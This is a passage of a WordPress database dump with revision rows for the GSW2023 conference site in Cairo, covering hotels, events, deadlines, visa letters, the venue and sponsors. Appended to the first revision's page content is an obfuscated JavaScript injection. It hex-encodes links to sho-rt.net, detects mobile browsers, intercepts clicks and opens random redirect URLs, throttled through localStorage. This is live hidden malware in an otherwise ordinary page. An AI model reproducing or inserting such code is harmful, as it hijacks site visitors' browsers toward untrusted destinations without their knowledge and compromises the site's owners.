2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-15 23:18:44','2023-08-15 23:18:44','',3066,'https://gsw2023.com/?p=5216',0,'revision','',0),
(5217,1,'2023-08-15 23:22:37','2023-08-15 23:22:37','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" 